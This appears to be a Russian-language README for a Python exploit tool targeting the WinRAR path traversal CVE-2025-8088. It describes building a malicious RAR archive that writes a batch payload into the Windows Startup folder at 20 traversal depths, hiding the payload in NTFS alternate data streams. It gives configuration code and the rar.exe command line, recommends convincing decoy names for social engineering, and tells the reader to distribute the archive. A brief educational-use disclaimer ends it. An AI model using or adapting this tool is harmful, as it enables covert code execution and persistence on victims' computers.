
Эксплуатирует системы, использующие старые версии WinRAR, без знания имени пользователя (в отличие от других проектов)


Этот Python-скрипт эксплуатирует уязвимость обхода пути (CVE-2025-8088) в WinRAR для развертывания полезных нагрузок в папке автозагрузки Windows, используя несколько относительных глубин пути. Эксплойт создаёт вредоносный RAR-архив, который при извлечении записывает полезные нагрузки в папку автозагрузки жертвы на различных уровнях вложенности каталогов.
Скрипт создаёт несколько файлов-приманок (по умолчанию 20), каждый из которых настроен на обход разного количества родительских каталогов:
NUM_DEPTHS = 20 # Number of different traversal depths
Каждый файл использует разную глубину пути:
File1.txt → ..\Startup\payload.bat
File2.txt → ..\..\Startup\payload.bat
...
File20.txt → ..\..\..\ (20 times) \Startup\payload.bat
Файлы-приманки по умолчанию содержат обычный текст, но их следует настраивать для реалистичной социальной инженерии:
# Create more convincing decoy content
decoy.write_text("Quarterly Financial Report Q3 2025.docx\n", encoding="utf-8")
Почему стоит изменить содержимое приманок?
По умолчанию полезная нагрузка представляет собой простой пакетный скрипт, но её можно заменить любым исполняемым файлом:
PAYLOAD = "@echo off\necho Payload executed!\npause\n"
Расположение полезной нагрузки:
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.bat
Итоговый вредоносный RAR-архив сохраняется как:
OUT_RAR = "exploit.rar"
Для генерации этого эксплойта требуется окружение Windows по нескольким причинам:
Зависимость от альтернативных потоков данных (ADS)
Эксклюзивная функция NTFS, используемая для присоединения полезных нагрузок:
ads_path = f"{decoy}:{placeholder}" # Windows-specific NTFS syntax
Требование наличия исполняемого файла WinRAR
Использует Windows CLI WinRAR:
subprocess.run(f'"{rar_exe}" a -ep -os "{base_rar}" ...')
Совместимость со структурой путей
Ориентирован на специфичные для Windows пути:
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu..."
Выполнение полезной нагрузки
Генерирует пакетные файлы Windows:
@echo off
start /B notepad.exe
Настройте конфигурацию:
# Configuration
NUM_DEPTHS = 20
RELATIVE_DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B notepad.exe\n" # Your actual payload
DECOY_FILE_PREFIX = "Financial_Report_Q3_" # More convincing names
Запустите скрипт:
python CVE-2025-8088.py
Распространите результат:
exploit.rarЭта версия кода просто позволяет запустить, например, python3 infect_premade_rarfiles.py website_backup.rar
Он извлечёт все файлы, внедрит полезную нагрузку в те, в которые это возможно, например .txt, .srt, .sql (не все типы файлов поддерживаются), а затем создаст готовый к запуску rar-файл.
⚠️ Этот инструмент предназначен только для образовательных целей и исследований в области безопасности.
Никогда не используйте его против систем без явного разрешения. Несанкционированное использование незаконно и аморально.